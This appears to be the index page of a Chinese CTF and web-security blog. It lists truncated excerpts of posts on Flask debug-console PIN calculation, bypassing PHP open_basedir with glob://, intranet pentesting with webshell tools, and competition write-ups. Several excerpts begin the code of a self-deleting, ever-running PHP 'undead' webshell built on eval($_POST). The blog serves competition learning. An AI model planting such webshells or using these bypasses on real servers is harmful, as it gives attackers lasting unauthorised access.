flask算pin flask在开启debug模式后会启动调试模式,一般为/console,需要正确的PIN码才能进入 python3.8和python3.6生成PIN的算法不同 算法代码在site-packages/werkzeug/debug/__init__.py 需要的信息 代码中 文件中 username getpass.getuser() /etc/passwd mod 2022-03-25 python #flask #python
php绕过open_basedir open_basedir一般用来限制跨目录读写文件 php绕过open_basedir是一个古老的漏洞,在2009年左右就被提出来了 glob://opendir()函数为打开目录句柄,readdir()函数为从目录句柄中读取条目。 这里结合两个函数来列举根目录中的文件: 1234567$a="glob:///*";if ( $b = opendir($a) 2022-03-25 php #总结 #php #open_basedir #bypass
HSC1th 2022-wp miscSign-inflag{HSC_W3LC0M3} DORAEMON 哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗? 压缩包先暴力破解出密码为376852 得到一张图片,发现高度不对劲,增加一点高度,看到破损的二维码把定位符补上,扫码得到flag 汝闻,人言否看到压缩包的50 4B 01 02,但是没找到头,搜了一下发现头被改成了4B 50结尾 2022-02-20 wp #wp #2022 #HSC
pwnthebox-内网渗透(入门) 使用到的工具kaliburpfirefoxreGeorgproxychainsnmap冰蝎蚁剑 题目描述根据描述得知有两层,因为是demo题目,所以给出了漏洞,降低了难度,实际上的题目漏洞点是不知道的,需要自己发掘 解题第一层apache解析漏洞上传1.php.jpg即可getshell 有了第一台主机的shell后首先要做的就是信息收集了 信息收集首先看ip,网段等信息。。。上来啥命令用不了 2022-01-14 内网 #内网渗透 #CVE
AWD不死马与克制方法 不死马一个典型的不死马: 12345678910111213<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.l.php'; $code = '<?php if(md5($_GET["pass"])== 2022-01-03 awd #awd #不死马
2021台州市首届网络安全大赛 喜提榜一 Webweb1flag在请求头中 web2扫描目录得到后台路径/admin 用admin,admin888弱口令进入后台 在网站安全一栏中使用检测木马功能,发现后门 使用文件管理功能查看木马文件,发现被混淆了 1234567891011<?php$mt = "mFsKCleRfU";$ojj = "IEBleldle";$hsa = &q 2021-12-17 wp #wp #2021 #台州
2021NUAA-wp 时间有点紧,有几题差一点 签到腾讯会议flag{we1c0m_t0_asur!ctf} miscbaby_mix伪加密,09改成00图片上边左边看到白条,应该是lsbstegsolve查看得到二维码扫码得到 14a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f57525 2021-12-11 wp #wp #nuaa #2021
【ctfshow】web入门-权限维持 WEB670-WEB676这几题做法都一样发现/var/www/html目录可写,既然是权限维持,那么直接传不死马 12345678910<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = '<?php @eval($_POST["shell& 2021-12-09 ctfshow-web入门 #wp #ctfshow #web入门
首届安徽省“追日杯”大学生网络安全挑战赛-wp 混了个三等奖,奖状至今未发(主办方跑路了。。。) MISCcheckinflag{welcome_to_zrb@2021} 阵法的奥秘提示是8进制,观察到最后的数字是变化的 123456789PING zrb.edisec.net: 56 data bytes64 bytes from zrb.edisec.net: icmp_seq=3 ttl=51 time=97.77 ms64 bytes 2021-12-05 wp #2021 #wp - 追日杯 - 安徽